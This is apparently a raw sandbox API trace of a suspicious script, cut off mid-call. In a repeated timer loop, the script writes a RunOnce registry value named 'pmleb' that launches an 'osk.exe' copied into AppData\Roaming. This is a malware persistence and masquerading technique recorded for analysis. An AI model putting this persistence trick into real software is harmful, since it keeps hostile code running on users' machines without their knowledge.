[0079.583] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.583] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x45 [0079.583] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.584] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x44 [0079.584] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.584] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.584] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.584] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.584] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.584] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 
lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.584] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.584] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.585] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.585] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.585] RegCloseKey (hKey=0x280) returned 0x0 [0079.585] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.585] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.585] SetTimer (hWnd=0x20280, nIDEvent=0x2044, uElapse=0xa, lpTimerFunc=0x0) returned 0x2044 [0079.585] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.597] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.597] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.597] KillTimer (hWnd=0x20280, uIDEvent=0x2044) returned 1 [0079.597] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.597] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.597] IUnknown:Release (This=0x787518) returned 0x1 [0079.597] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.598] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.598] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, 
varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.598] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.598] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.598] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.598] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.598] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.598] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.598] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x45 [0079.598] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, 
[1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.598] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x46 [0079.598] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.599] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x45 [0079.599] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.599] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.599] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.599] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.599] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.599] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 
lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.599] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.599] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.600] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.600] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.600] RegCloseKey (hKey=0x280) returned 0x0 [0079.600] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.600] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.600] SetTimer (hWnd=0x20280, nIDEvent=0x2045, uElapse=0xa, lpTimerFunc=0x0) returned 0x2045 [0079.600] 
GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.612] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.612] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.612] KillTimer (hWnd=0x20280, uIDEvent=0x2045) returned 1 [0079.613] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.613] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.613] IUnknown:Release (This=0x787518) returned 0x1 [0079.613] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.613] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.613] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, 
pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.613] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.613] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.613] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.613] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.613] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.613] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.613] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x46 [0079.613] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 
0x0 [0079.613] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x47 [0079.613] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.614] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x46 [0079.614] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.614] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.614] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.614] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.614] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.614] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, 
lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.615] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.615] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.615] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.615] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.615] RegCloseKey (hKey=0x280) returned 0x0 [0079.615] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.615] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.615] SetTimer (hWnd=0x20280, nIDEvent=0x2046, uElapse=0xa, lpTimerFunc=0x0) returned 0x2046 [0079.615] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.633] TranslateMessage (lpMsg=0x33f7fc) 
returned 0 [0079.633] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.633] KillTimer (hWnd=0x20280, uIDEvent=0x2046) returned 1 [0079.633] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.633] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.633] IUnknown:Release (This=0x787518) returned 0x1 [0079.634] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.634] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.634] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.634] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 
[0079.634] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.634] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.634] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.634] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, 